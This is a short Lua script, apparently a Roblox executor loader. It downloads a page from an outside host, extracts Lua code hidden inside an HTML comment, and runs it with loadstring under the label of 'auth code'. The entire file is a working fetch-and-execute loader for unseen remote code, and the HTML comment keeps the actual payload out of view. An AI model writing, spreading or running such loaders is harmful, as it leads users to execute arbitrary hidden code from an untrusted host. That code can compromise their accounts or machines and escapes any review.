-- 1) Fetch the raw HTML
local url     = "https://zte.ct.ws/?=wiissjj"
local website = game:HttpGet(url)

-- 2) Debug: show us what we actually got back
print("=== RAW FETCH from "..url.." ===")
print( website:sub(1,200) )   -- first 200 chars
print("================================")

-- 3) Find the comment markers
local start_i, _    = website:find("<!--")
local _,      end_i = website:find("-->", start_i and start_i+1 or 1)

-- 4) If either find failed, bail with a helpful error
if not start_i then
    error("Couldn't find '<!--' in the fetched HTML")
elseif not end_i then
    error("Couldn't find '-->' in the fetched HTML")
end

-- 5) Extract the Lua in between and run it
local lua_code = website:sub(start_i + 4, end_i - 1)
local ok, err  = pcall(loadstring(lua_code))
if not ok then
    error("Error loading auth code: "..tostring(err))
end
